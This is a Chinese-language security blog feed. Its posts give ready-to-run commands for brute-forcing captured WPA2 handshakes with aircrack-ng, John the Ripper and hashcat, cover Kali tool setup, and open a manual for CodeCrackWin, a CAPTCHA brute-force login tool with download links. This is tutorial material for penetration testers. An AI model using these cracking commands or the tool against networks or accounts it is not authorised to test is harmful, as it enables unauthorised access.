</div>雅技資訊技術http://www.blogger.com/profile/06948808120337987647noreply@blogger.com0tag:blogger.com,1999:blog-1967825056283652287.post-45996555888992345732021-09-12T06:46:00.007+08:002021-09-12T06:55:09.205+08:00hashcat到底怎麼了?不認得cap2hccapx轉出的檔案<div style="border: 3px solid rgb(8, 108, 197); font-size: 14pt; line-height: 150%; padding: 8px;">
<p style="margin-bottom: 8px; text-indent: 2em;">
玩暴力破解的人,對John the Ripper(簡稱JtR)和Hashcat應該不陌生,這幾天趁空想比較JtR、Hashcat及Aircrack-ng破解WPA2的操作方法,論效能,大家潛意識會選Hashcat吧!所以這篇不是比較效能,而是比較不同的操作方法。</p><p style="margin-bottom: 8px; text-indent: 2em;">三種方法的前置作業都是先擷取封包,就是利用airodump-ng抓取目標AP的封包。當收集足夠理想的封包後,接下來的作法就略有不同。本例採用「<b><span style="color: #0b5394;">暴力破解</span></b>」,假設密碼是8位的數字(密碼愈長愈複雜,破解時間愈長)。</p>
<p style="font-weight: bold;">利用aircrack-ng破解</p>
<p style="margin-bottom: 8px; text-indent: 2em;">aircrack-ng可以直接處理擷取到的*.cap檔,但本身無暴力產生密碼功能,需要借助用john的mask模式,指令如下:(aircrack-ng的<span style="background-color: #fcff01;">-w -</span>參數表示從STDIN讀入字典)</p>
<div style="border: 2px solid green; margin: 0px; padding: 0px;">
<div style="font-size: 12pt; margin-left: 8em; padding: 4px; text-indent: -8em;"><span style="color: #990000;">john </span>--mask=?d?d?d?d?d?d?d?d --stdout | <span style="color: #990000;">aircrack</span>-ng -a 2 -b 1C:AB:C0:DD:xx:xx abc-01.cap <b><span style="background-color: #fcff01; color: #cc0000;">-w -</span></b></div>
</div>
<div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYUExeZnYxFeEDWi2VVqbo9_3f4omJw-IBUYqN2-k8czrL4TVysFaXe-ojQXRH0zvDpJn-2xMIzuwZBUgklAHDadJ7ip0SjJheig5N1c467MH6-aC0PxkhbVBaqBSohM5PnkV8atLltuYG/s829/aircrack-ng-AP.PNG" style="display: block; padding: 1em 0px; text-align: center;"><img alt="" border="0" data-original-height="665" data-original-width="829" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYUExeZnYxFeEDWi2VVqbo9_3f4omJw-IBUYqN2-k8czrL4TVysFaXe-ojQXRH0zvDpJn-2xMIzuwZBUgklAHDadJ7ip0SjJheig5N1c467MH6-aC0PxkhbVBaqBSohM5PnkV8atLltuYG/s400/aircrack-ng-AP.PNG" width="400" /></a></div>
<p style="font-weight: bold;">利用Johnt the Ripper破解</p>
<p>要使用JtR破解WPA2,必須先利用wpapcap2john將*.cap轉成JtR認得的格式:</p>
<div style="border: 2px solid green; margin: 0px; padding: 0px;">
<div style="font-size: 12pt; margin-left: 8em; padding: 4px; text-indent: -8em;"><span style="color: #990000;">wpapcap2john</span> abc-0*.cap > ap.john</div>
<div style="font-size: 12pt; margin-left: 8em; padding: 4px; text-indent: -8em;"><span style="color: #990000;">john </span>--mask=?d?d?d?d?d?d?d?d --format=wpapsk ap.john</div>
</div>
<div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVYHrOgSSZEZV_Am7uuKVm_AyRgM7Nf9bchV9zfgYh_Te9pFD-8XcItTf01BrtQGWBPrCLjc1xa0kavToEQjQxBdiQVFMKW5eHdML7hDnNU_8TF1zcZ054xaOC7CFXuBoLqPlI70BjkngL/s828/john_the_ripper-AP.PNG" style="display: block; padding: 1em 0px; text-align: center;"><img alt="" border="0" data-original-height="541" data-original-width="828" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVYHrOgSSZEZV_Am7uuKVm_AyRgM7Nf9bchV9zfgYh_Te9pFD-8XcItTf01BrtQGWBPrCLjc1xa0kavToEQjQxBdiQVFMKW5eHdML7hDnNU_8TF1zcZ054xaOC7CFXuBoLqPlI70BjkngL/s400/john_the_ripper-AP.PNG" width="400" /></a></div>
<p style="font-weight: bold;">利用Hashcat破解</p>
<p>要使用Hashcat破解WPA2,必須先利用cap2hccpax或aircrack-ng將*.cap轉成hccapx格式:</p>
<div style="border: 2px solid green; margin: 0px; padding: 0px;">
<div style="font-size: 12pt; margin-left: 8em; padding: 4px; text-indent: -8em;"><span style="color: #990000;">aircrack-ng </span>-j ap.hccapx abc-01.cap</div>
<div style="font-size: 12pt; margin-left: 8em; padding: 4px; text-indent: -8em;"><span style="color: #990000;">cap2hccapx</span> abc-01.cap ap.hccapx</div>
<div style="font-size: 12pt; margin-left: 8em; padding: 4px; text-indent: -8em;"><span style="color: #990000;">hashcat </span>-a 3 -m 22000 ap.hccapx ?d?d?d?d?d?d?d?d</div>
</div>
<div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvjYDTfl0FUvkfUELWz37TDkFPeIgf_prgBLlVe1emb8rHJ5wbqBY_VgN7TX4j-xQ_yDcRwofKxZwmpCiZzKof9rVAv3b_1z-Cfm_46jksWkFsM4xqRWlaFuM8lBLCh3HgpYkbgubqmzaH/s907/hashcat-AP.PNG" style="display: block; padding: 1em 0px; text-align: center;"><img alt="" border="0" data-original-height="828" data-original-width="907" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvjYDTfl0FUvkfUELWz37TDkFPeIgf_prgBLlVe1emb8rHJ5wbqBY_VgN7TX4j-xQ_yDcRwofKxZwmpCiZzKof9rVAv3b_1z-Cfm_46jksWkFsM4xqRWlaFuM8lBLCh3HgpYkbgubqmzaH/s400/hashcat-AP.PNG" width="400" /></a></div>
<hr />
<p style="font-weight: bold;">不同版本的hccapx</p>
<div style="margin-bottom: 8px;">Kali裡的hashcat 6.1.1版可以正常破解cap2hccpax轉出的檔案,但Windows 10裡的6.2.4卻出現下列錯誤:<br />
<div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUVVkQrkDtebL7j0_q5Rc28B7pYv7JooXeUCqWXK7nIhdo8kTVeE757SpJDWMzbG-62jOpJFiMPQxwzVYccMvxzCUroTIotQp9c-hpc7oO1yZLmIkwtu4r6tEHbdk0P-Xxau4bnL7CyOuF/s804/hashcat-separator_unmatched.PNG" style="display: block; padding: 1em 0px; text-align: center;"><img alt="" border="0" data-original-height="695" data-original-width="804" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUVVkQrkDtebL7j0_q5Rc28B7pYv7JooXeUCqWXK7nIhdo8kTVeE757SpJDWMzbG-62jOpJFiMPQxwzVYccMvxzCUroTIotQp9c-hpc7oO1yZLmIkwtu4r6tEHbdk0P-Xxau4bnL7CyOuF/s400/hashcat-separator_unmatched.PNG" width="400" /></a></div>
</div>
<p>由<a href="https://hashcat.net/cap2hashcat/">https://hashcat.net/cap2hashcat/</a>線上轉檔的結果,hashcat 6.2.4版則可正常處理。</p>
<div>1. 將.cap檔上傳到<a href="https://hashcat.net/cap2hashcat/">https://hashcat.net/cap2hashcat/</a><br />
<div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjxpA9ymprexFIImLw1updc8Y1h9yssB-cKr-rxhWuqceuYC0mr5zZetMIx50KyPAsNCyimenqxkXMd0XkJ61zs5wqtJDUqkmC0aahcc25Bqv_XSj4kNFgQmdd8va3stUKpcgQ9l-EhU1f/s1330/Conver-online.PNG" style="display: block; padding: 1em 0px; text-align: center;"><img alt="" border="0" data-original-height="587" data-original-width="1330" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjxpA9ymprexFIImLw1updc8Y1h9yssB-cKr-rxhWuqceuYC0mr5zZetMIx50KyPAsNCyimenqxkXMd0XkJ61zs5wqtJDUqkmC0aahcc25Bqv_XSj4kNFgQmdd8va3stUKpcgQ9l-EhU1f/s400/Conver-online.PNG" width="400" /></a></div>
</div>
<div>2. 下載轉檔後的結果<br />
<div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDdPLsaeGdoGsQX0O7x_rGzSQzppC10JSb8aj-BKRh6bwiaFYyjoWQh551Dz6FUnd2MYZOtNeHU8Hqspo_SQ1p2uXmNezHXWzPB0S6K8RKjhZBOcXgyukE-KhR0GqNk8rO4gWUl6ys5VuH/s1023/Conver-online-download.PNG" style="display: block; padding: 1em 0px; text-align: center;"><img alt="" border="0" data-original-height="891" data-original-width="1023" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiDdPLsaeGdoGsQX0O7x_rGzSQzppC10JSb8aj-BKRh6bwiaFYyjoWQh551Dz6FUnd2MYZOtNeHU8Hqspo_SQ1p2uXmNezHXWzPB0S6K8RKjhZBOcXgyukE-KhR0GqNk8rO4gWUl6ys5VuH/s400/Conver-online-download.PNG" width="400" /></a></div>
</div>
<div style="margin-bottom: 8px; text-indent: 2em;">經比較發現,<span style="font-size: 14pt; text-indent: 37.3333px;">cap2hccpax或aircrack-ng轉檔的結果是二進制檔,而</span><span style="font-size: 14pt; text-indent: 2em;">線上轉檔的結果是文字檔,所以,想用Windows的hashcat破解WPA2,可以將*.cap檔上傳到</span><a href="https://hashcat.net/cap2hashcat/" style="font-size: 14pt; text-indent: 2em;">https://hashcat.net/cap2hashcat/</a><span style="font-size: 14pt; text-indent: 2em;">轉檔。</span></div>
<div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJWSS9T3ko9zatTPnluKQXCnXjU8Ue7cA3OcErKRoGD-ffQ400D93ERCpTQEJGx8bHzQNtrCuHHemtYVJ9qYyNG1SIvWK4u3_X_cae1UwVOUEoHbaqQ4DCH5QyGZ0CJ7hxa5rt98edXy34/s914/cmp-hccapx.PNG" style="display: block; padding: 1em 0px; text-align: center;"><img alt="" border="0" data-original-height="500" data-original-width="914" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJWSS9T3ko9zatTPnluKQXCnXjU8Ue7cA3OcErKRoGD-ffQ400D93ERCpTQEJGx8bHzQNtrCuHHemtYVJ9qYyNG1SIvWK4u3_X_cae1UwVOUEoHbaqQ4DCH5QyGZ0CJ7hxa5rt98edXy34/s400/cmp-hccapx.PNG" width="400" /></a></div>
</div>雅技資訊技術http://www.blogger.com/profile/06948808120337987647noreply@blogger.com0tag:blogger.com,1999:blog-1967825056283652287.post-2229206965830959282021-09-08T14:02:00.000+08:002021-09-08T20:49:16.960+08:00Kali的sparta整合工具不見了,請改用legion<div style="border: 3px solid rgb(8, 108, 197); font-size: 14pt; line-height: 150%; padding: 8px;">
<p style="margin-bottom: 8px; text-indent: 2em;">
sparta是一款圖形化的整合型掃描與枚舉平台,本身並沒有掃描功能,但它將nmap、Nikto、hydra、nbtscan等多種工具整合在一起,我們只要提供待測目標的網址清單,sparta就會利用nmap掃描,再依照掃描結果調用其他工具做後續處理,可替滲透測試人節省掉很多時間。 </p><p style="margin-bottom: 8px; text-indent: 2em;"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgd7gyi0QrZp3LAri7L0trPNdvl7aLmb1hzoTx9PaxYfi21WDD5FMxiaOokYmglBnxDGEKSL4FlqCxi6ZjhcLqF1PBF76dAWk0b42gwz9jqI0FARpyri_uZpxj13dS7Q6VtT8zs_s_laCnj/s1029/Fig_07-12.PNG" style="margin-left: 1em; margin-right: 1em;"><img alt="sparta" border="0" data-original-height="790" data-original-width="1029" height="308" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgd7gyi0QrZp3LAri7L0trPNdvl7aLmb1hzoTx9PaxYfi21WDD5FMxiaOokYmglBnxDGEKSL4FlqCxi6ZjhcLqF1PBF76dAWk0b42gwz9jqI0FARpyri_uZpxj13dS7Q6VtT8zs_s_laCnj/w400-h308/Fig_07-12.PNG" title="sparta執行畫面" width="400" /></a></div>
<p style="margin-bottom: 8px; text-indent: 2em;">
由於sparta的開發者已不在維護,而它的執行環境是python 2.6,也是已過時的版本,故Kali自2019.4版之後就移除sparta了,對於習慣使用sparta從事滲透測試者,或許可以<span style="color: #cc0000;"><b>改用legion</b></span>,<span style="color: #38761d;">legion的操作介面幾乎和sparta一樣</span>。不過,Kali並未事先安裝legion,需要自己動手:
</p>
<div style="border: 2px solid rgb(246, 13, 221); font-size: 14pt; line-height: 100%; padding: 8px;">
<b>apt-get install legion
</b></div>
<div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUU0XeY7t9zTuM5CnoAvUeToUXg10R546eOrHheWvAs03UzNixHnv5sEg0aBNvRk30MCcf5GNEmc7EtXxaztfnYCVfOw0JDlDg_tZNd9hCQ258t5NQszs_cwLOswx2iScExuIASrL95HD_/s1191/Fig_07-13.PNG" style="display: block; padding: 1em 0px; text-align: center;"><img alt="legion執行畫面" border="0" data-original-height="887" data-original-width="1191" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhUU0XeY7t9zTuM5CnoAvUeToUXg10R546eOrHheWvAs03UzNixHnv5sEg0aBNvRk30MCcf5GNEmc7EtXxaztfnYCVfOw0JDlDg_tZNd9hCQ258t5NQszs_cwLOswx2iScExuIASrL95HD_/s400/Fig_07-13.PNG" title="legion執行畫面" width="400" /></a></div>
<p style="margin-bottom: 8px; text-indent: 2em;">安裝後,可參考「<a href="http://atic-tw.blogspot.com/2021/09/kaliapplications-menu.html">自定Kali應用程式選單(Applications Menu) 的項目(成員)</a>」這篇的作法,將legion加到Kali應用程式選單中,底下就是筆者的legion.desktop內容,加入選單後,就可分別從「<span style="color: #2b00fe;">01-信息收集</span>─><span style="color: #38761d;">情報分析</span>」及「<span style="color: #2b00fe;">05-密碼攻擊</span>─><span style="color: #38761d;">在線攻擊</span>」兩處找到legion:
</p>
<div style="border: 2px solid rgb(246, 13, 221); font-size: 14pt; line-height: 140%; padding: 4px;">
[Desktop Entry]<br />
Name=legion(Sparta)<br />
Encoding=UTF-8<br />
Exec=legion<br />
Icon=kali-menu<br />
StartupNotify=false<br />
Terminal=true<br />
Type=Application<br />
Categories=01-07-osint-analysis;05-01-online-attacks;<br />
X-Kali-Package=legion<br />
</div>
<div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuLU6AtCaGhrmspCbShW5fP-fUaitVZQP-8QgbCH3rGOhaVL4JiQY7U_2hsV8WSlMO9d0uT8SrLBdphnkkHqDAHS5QSsrYcGMEcq2uTGSs-FF4cQuKbLcOWuHo5FI_cMH-qBJmLCPk0l0K/s629/Fig_07-14.PNG" style="display: block; padding: 1em 0px; text-align: center;"><img alt="" border="0" data-original-height="629" data-original-width="578" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhuLU6AtCaGhrmspCbShW5fP-fUaitVZQP-8QgbCH3rGOhaVL4JiQY7U_2hsV8WSlMO9d0uT8SrLBdphnkkHqDAHS5QSsrYcGMEcq2uTGSs-FF4cQuKbLcOWuHo5FI_cMH-qBJmLCPk0l0K/s400/Fig_07-14.PNG" /></a></div>
</div>雅技資訊技術http://www.blogger.com/profile/06948808120337987647noreply@blogger.com0tag:blogger.com,1999:blog-1967825056283652287.post-70564049829870904112021-09-08T11:28:00.001+08:002021-09-08T11:29:40.196+08:00自定Kali應用程式選單(Applications Menu) 的項目(成員)<div style="border: 3px solid rgb(234, 193, 23); font-size: 14pt; line-height: 150%; padding: 8px;">
<p style="margin-bottom: 8px; text-indent: 2em;">Kali以前使用Gnome桌面,可以透過Alacarte工具編輯應用程式選單。改用Xfce桌面後,還是可以安裝Alacarte,但是它只能編輯現有項目的屬性,卻無法新增項目。</p>
<p style="margin-bottom: 8px; text-indent: 2em;">網路推薦的Xfce選單編輯器是<span style="color: #2b00fe;"><b>menulibre</b></span>,安裝後一執行卻出現「<span style="color: red;">MenuLibre cannot be run as root.</span>」,不能用root執行,偏偏我已習慣用root操作Kali。</p><p style="margin-bottom: 8px; text-indent: 2em;"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWDHckXyVHmxqt8hWUj-JQUYVJwJnkI407wkeZANPM3jJasM7PxsH92ngvdlXYBFkDnMZrC9btneRA4FINS2sv4poq2Gv5nFTWKguN78h4xIby7EO_siIjecrOstGe2o0n6DPoJRv6-ncZ/s551/kali-001.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="145" data-original-width="551" height="105" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWDHckXyVHmxqt8hWUj-JQUYVJwJnkI407wkeZANPM3jJasM7PxsH92ngvdlXYBFkDnMZrC9btneRA4FINS2sv4poq2Gv5nFTWKguN78h4xIby7EO_siIjecrOstGe2o0n6DPoJRv6-ncZ/w400-h105/kali-001.PNG" width="400" /></a></div><p></p><p style="margin-bottom: 8px; text-indent: 2em;">為此,另外建了一組帳號,再執行「<b> su - kali -c menulibre</b>」,這次出現別的錯誤:</p>
<div style="border: 2px solid rgb(246, 13, 221); font-size: 10pt; line-height: 100%; padding: 4px;">
<span style="color: red;">root@kali-2020-3</span>:<span style="color: #2b00fe;"><span style="color: #3d85c6;">~</span>#</span> su - kali -c menulibre<br />
┏━(Message from Kali developers)<br />
┃<br />
┃ We have kept /usr/bin/python pointing to Python 2 for backwards<br />
┃ compatibility. Learn how to change this and avoid this message:<br />
┃ ⇒ https://www.kali.org/docs/general-use/python3-transition/<br />
┃<br />
┗━(<span style="color: #b45f06;">Run: “touch ~/.hushlogin” to hide this message</span>)<br />
Unable to init server: Could not connect: Connection refused<br />
Unable to init server: 無法連接:Connection refused<br />
<br />
(menulibre:4377): Gtk-CRITICAL **: 08:10:06.059: gtk_icon_theme_get_for_screen: assertion 'GDK_IS_SCREEN (screen)' failed<br />
No menu prefix found, MenuLibre will not function properly.<br />
Unable to init server: 無法連接:Connection refused<br />
<br />
(menulibre:4377): Gtk-WARNING **: 08:10:06.082: cannot open display: </div>
<p>實在不想花太多時間去處理偶爾才用一次的功能,最後還是將menulibre移除了。</p>
<hr />
<p style="margin-bottom: 8px; text-indent: 2em;"><b>為什麼需要編輯功能表?</b>因為新安裝工具後,若一段時間不用,常忘了工具的名稱,如果能將工具安排在選單裡,就算忘了名稱,大概還記得工具的類型,較容易從選單裡找到。</p>
<p style="margin-bottom: 8px; text-indent: 2em;">既然Alacarte及menulibre不能用,就改用<b>手工編輯</b>吧!反正偶爾才用一次。</p>
<div style="background-color: #f8b5af; border: 2px solid rgb(248, 27, 5); padding: 4px;">
<p style="margin-left: 3em; text-indent: -3em;">
<span style="color: #cc0000;"><b>注意:</b></span><b>這不是標準,也非精確的作法,只是剛好解決在應用程式選單加入新項目的需求。</b></p></div>
<p style="margin-bottom: 8px; text-indent: 2em;">首先是xfce的選單項目是存放在「<span style="color: #0b84da;">/usr/share/kali-menu/applications/</span>」目錄裡,每個項目的副檔名是「<span style="color: #38761d;">.desktop</span>」,就以「Kali-nmap.desktop」為例,其內容如下:</p>
<div style="border: 2px solid rgb(100, 237, 108); padding: 6px;">
[Desktop Entry]<br />
Name=nmap<br />
Encoding=UTF-8<br />
Exec=/usr/share/kali-menu/exec-in-shell "nmap"<br />
Icon=kali-nmap<br />
StartupNotify=false<br />
Terminal=true<br />
Type=Application<br />
Categories=01-info-gathering;01-04-network-scanners;02-vulnerability-analysis;<br />
X-Kali-Package=nmap</div>
<p style="margin-bottom: 8px; text-indent: 2em;">這是<b>相對單純</b>的項目內容,還有其他更複雜的項目,但這個單純範例已符合我的需要!當需要新增項目的,就可以直接複製Kali-nmap.desktop來修改,例如要增加一個vega選項:</p>
<div style="border: 2px solid rgb(100, 237, 108); padding: 4px;"><span style="color: #0b5394;">cp Kali-nmap.desktop vega.desktop</span></div>
<p>然後編輯vega.desktop,如下:</p>
<div style="border: 2px solid rgb(100, 237, 108); padding: 4px;">
[Desktop Entry]<br />
Name=<b><span style="color: #cc0000;">vega</span></b><br />
Encoding=UTF-8<br />
Exec=<b><span style="color: #cc0000;">vega</span></b><br />
Icon=<b><span style="color: #cc0000;">kali-menu</span></b><br />
StartupNotify=false<br />
Terminal=true<br />
Type=Application<br />
Categories=<b><span style="color: #cc0000;">01-info-gathering;03-05-web-vulnerability-scanners;</span></b><br />
X-Kali-Package=<b><span style="color: #cc0000;">vega</span></b></div>
<p style="margin-bottom: 8px; text-indent: 2em;">主要修改部分如<b><span style="color: #cc0000;">紅粗字</span></b>,<b><span style="background-color: #fcff01;">接著將此檔案複製一份到「<span style="color: #3d85c6;">/usr/share/applications/</span>」</span></b>,這樣就完成選單項目新增,如下圖黃圈的vega就是我手工加到選單上的。當然,只要將檔案刪除就可移除選單項目。</p>
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjqG6Y1TRJhPGIoqg1tJqBBMITvdPSytCukaXV2fYp4CdK1MaWb5o1jnBCXVLJfFqqvS9CDYsi5A-GAOaySlE_Zxw6SD7o6kdhw48rPnBWX6xxcV4dSe8cC3ibHgEsSjTreUImLAz5mAzn/s623/kali-004.PNG" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="623" data-original-width="579" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjqG6Y1TRJhPGIoqg1tJqBBMITvdPSytCukaXV2fYp4CdK1MaWb5o1jnBCXVLJfFqqvS9CDYsi5A-GAOaySlE_Zxw6SD7o6kdhw48rPnBWX6xxcV4dSe8cC3ibHgEsSjTreUImLAz5mAzn/w371-h400/kali-004.PNG" width="371" /></a></div>
<p><b><span style="color: #990000;">再說一次,這不是標準作法,只是剛好解決增、刪、改選單項目的要求。</span></b></p>
<p style="font-size: 16pt;"><b>檔案內容說明</b></p>
<div style="border: 2px solid rgb(100, 237, 108); padding: 4px;">
[Desktop Entry] <span style="color: #38761d;"># 區段名稱,不需修改</span><br />
Version=1.0 <span style="color: #38761d;"># 版號</span><br />
Name=<span style="color: #990000;">vega</span> <span style="color: #38761d;"># 呈現的名稱,各語系通用,<span style="color: #990000;">要修改</span></span><br />
Comment=Web vulnerability Scanner <span style="color: #38761d;"># 提示文字,當滑鼠停駐項目時彈出,各語系通用</span><br />
Name[zh_CN]=vega<span class="VIiyi" lang="zh-CN">
<span class="JLqJ4b" data-language-for-alternatives="zh-CN" data-language-to-translate-into="zh-CN" data-phrase-index="0">
<span>扫描</span>
</span>
</span> <span style="color: #38761d;"># <span style="color: #cc0000;">zh_CN</span>,作業系統使用<span style="color: #cc0000;">簡中</span>語系時呈現的名稱</span><br />
Comment[zh_CN]=<span class="VIiyi" lang="zh-CN">
<span class="JLqJ4b" data-language-for-alternatives="zh-CN" data-language-to-translate-into="zh-CN" data-phrase-index="0">
<span>Web漏洞扫描工具 <span style="color: #38761d;">#</span></span><span style="color: #38761d;">
</span></span><span style="color: #38761d;">
</span></span><span style="color: #38761d;"> <span style="color: #cc0000;">zh_CN</span>,作業系統使用<span style="color: #cc0000;">簡中</span>語系時呈現的提示文字</span><br />
Name[zh_TW]=vega<span class="VIiyi" lang="zh-CN">
<span class="JLqJ4b" data-language-for-alternatives="zh-CN" data-language-to-translate-into="zh-CN" data-phrase-index="0">
<span>掃描</span>
</span>
</span> <span style="color: #38761d;"># <span style="color: #cc0000;">zh_TW</span>,作業系統使用<span style="color: #cc0000;">繁中</span>語系時呈現的名稱</span><br />
Comment[zh_TW]=<span class="VIiyi" lang="zh-CN">
<span class="JLqJ4b" data-language-for-alternatives="zh-CN" data-language-to-translate-into="zh-CN" data-phrase-index="0">
<span>Web漏洞</span>
</span>
</span>
<span class="VIiyi" lang="zh-CN">
<span class="JLqJ4b" data-language-for-alternatives="zh-CN" data-language-to-translate-into="zh-CN" data-phrase-index="0">
<span>
<span class="VIiyi" lang="zh-CN">
<span class="JLqJ4b" data-language-for-alternatives="zh-CN" data-language-to-translate-into="zh-CN" data-phrase-index="0">
<span>掃描</span>
</span>
</span>工具 <span style="color: #38761d;">#</span></span><span style="color: #38761d;">
</span></span><span style="color: #cc0000;">
</span></span><span style="color: #38761d;"><span style="color: #cc0000;"> zh_TW</span>,作業系統使用<span style="color: #cc0000;">繁中</span>語系時呈現的提示文字</span><br />
Encoding=UTF-8 <span style="color: #38761d;"># 編碼格式</span><br />
Type=Application <span style="color: #38761d;"># 類型 Application,或Link</span><br />
Exec=vega <span style="color: #38761d;"># 選擇此項目時要執行的命令,如同手動在終端機執行</span><br />
Icon=<span style="color: #990000;">kali-menu</span> <span style="color: #38761d;"># 此選單項目的圖示,請參考下列「<b>Icon的來源</b>」段</span><br />
StartupNotify=false <span style="color: #38761d;"># 啟動時,要不要顯示提示視窗?反正設為false就對了</span><br />
Terminal=true <span style="color: #38761d;"># ?? 不清楚,照著設為true</span><br />
Categories=<span style="color: #990000;">02-vulnerability-analysis; </span> <span style="color: #38761d;"> # 要放在選單的哪個分類下,若要放在多個分類,請用「;」分隔,至於怎麼找到分類名稱,請參考下面「<b>分類名稱來源</b>」段的說明</span><br />
X-Kali-Package=<span style="color: #990000;">vega</span> <span style="color: #38761d;"># kali裡的套件名稱</span> </div>
<p style="margin-bottom: 8px; text-indent: 2em;">除了<span style="color: #2b00fe;">Type=Application</span>使用用Exec執行命令外,如果「<span style="color: #2b00fe;">Type=Link</span>」則可透過「<span style="color: #2b00fe;">URL=<URL></span>」指定欲由預設瀏覽器開啟的網址。</p>
<p style="margin-bottom: 8px; text-indent: 2em;">如果<b>希望應用程式在終端機內執行</b>,可將<span style="color: #2b00fe;">Exec</span>的值修改如下,前段的「<span style="color: #2b00fe;">/usr/share/kali-menu/exec-in-shell</span>」會啟動作業系統的終端機,後段的「"<span style="color: #cc0000;">hydra -h</span>"」代表要在此終端機內執行的命令及傳遞 此命令的參數。</p>
<div style="border: 2px solid rgb(100, 237, 108); padding: 4px;">Exec=<span style="color: #2b00fe;">/usr/share/kali-menu/exec-in-shell</span> "<span style="color: #cc0000;">hydra -h</span>"</div>
<p><br /></p>
<p style="font-size: 16pt;"><b>Icon的來源</b></p>
<p style="margin-bottom: 8px; text-indent: 2em;">項目內容裡的Icon參數<b>只需指定圖示名稱</b>,系統會參照「<span style="color: #3d85c6;">/usr/share/icons/hicolor/<span style="color: #cc0000;">DxD</span>/apps/</span>」內的同名稱圖示檔,如上例的「<span style="color: #3d85c6;">kali-menu</span>」就是指 kali-menu.png,前述路徑裡的<span style="color: #cc0000;">DxD</span>是指圖示大小,有興趣者,可以自己到「<span style="color: #3d85c6;">/usr/share/icons/hicolor/</span>」目錄下找找!</p>
<p style="font-size: 16pt;"><b>分類名稱來源</b></p>
<p style="margin-bottom: 8px; text-indent: 2em;">分類名稱就從現有的選單項目內容去,例如想找自定的選單項目放在「<span style="color: #990000;">06-無線攻擊</span>」裡的「<span style="color: #990000;">藍牙工具集</span>」,「<span style="color: #0b5394;">cat kali-btscanner.desktop</span>」就會發現分類名稱是「<span style="color: #990000;"><b>06-02-bluetooth-tools</b></span>」</p>
<div style="border: 2px solid rgb(100, 237, 108); padding: 4px;">
<span style="color: red;">root@kali-2019-3</span>:<span style="color: #3d85c6;">/usr/share/applications</span># <b>cat kali-btscanner.desktop</b> <br />
[Desktop Entry]<br />
Name=btscanner<br />
Encoding=UTF-8<br />
Exec=/usr/share/kali-menu/exec-in-shell "btscanner -h"<br />
Icon=kali-menu<br />
StartupNotify=false<br />
Terminal=true<br />
Type=Application<br />
Categories=<span style="background-color: #b6d7a8;"><span style="color: #cc0000;">06-02-bluetooth-tools;</span></span><br />
X-Kali-Package=btscanner<br />
</div>
<hr />
<p>不要問我如何新增分類夾,我還沒有找到答案,如果有人知道,也請告訴我,謝謝!</p>
</div>雅技資訊技術http://www.blogger.com/profile/06948808120337987647noreply@blogger.com0tag:blogger.com,1999:blog-1967825056283652287.post-24487457322642594842021-08-31T10:47:00.006+08:002021-09-06T20:02:56.012+08:00CodeCrackWin 3.0版(圖形驗證碼暴力破解工具) 使用說明<div style="border: 3px solid rgb(100, 149, 237); font-size: 14pt; line-height: 180%; padding: 8px;">
<p>之前版本使用WebBrowser組件處理請求及回應,發現無法正確處理Ajax及JSON,因此重新改寫,仍由WebBrowser讀取第一頁面,以便取得登入欄位及驗證碼圖形。暴力測試測試則改由HttpWebRequest處理,以解決前版遭遇的問題。<br /></p>
<div style="background-color: #fadbd8; border: 2px solid rgb(51, 255, 51); line-height: 100%; margin: 4px; padding: 4px;">
<p>執行檔下載:<a href="https://drive.google.com/file/d/17x_CqgwkfjI-YgT3UZxsLtYM6EMMDn_Z/view?usp=sharing">CodeCrackWin.ZIP</a>(記得調整設定檔 CodeCrackWin.config)</p>
<p>原始碼下載: <a href="https://drive.google.com/file/d/1u5gxGqqUpZPjok-E6BEpjouQfndYOQG5/view?usp=sharing">CodeCrackWin-source.ZIP</a> (本專案是用 Visual Studio 2013開發的)</p>
<p>範例網頁:<a href="https://drive.google.com/file/d/1OTqu8KoeJ3zXr3vsOxNc0gAJOeTg4N-9/view?usp=sharing">CodeCrackDemo.ZIP</a> (請自行掛載到IIS)</p>
</div>
<div style="color: #990000; font-size: 14pt; font-weight: bold;">一、前言</div>
<div style="margin-left: 2em;">CodeCrackWin是以.NET 3.5為基礎,用C#寫成的,主要的OCR元件為tessdata 4的函式庫。這支程式算是入門級,可能還有很多狀況沒有考慮到,因此<span style="color: #660000; font-weight: bold;">誤判率可能不低,能應付的圖形碼也有限</span>,當初開發的目的只是為了測試使用者是否使用弱密碼,但軟體總是要先有初版,如果不符您的需求,請直接移除。</div>
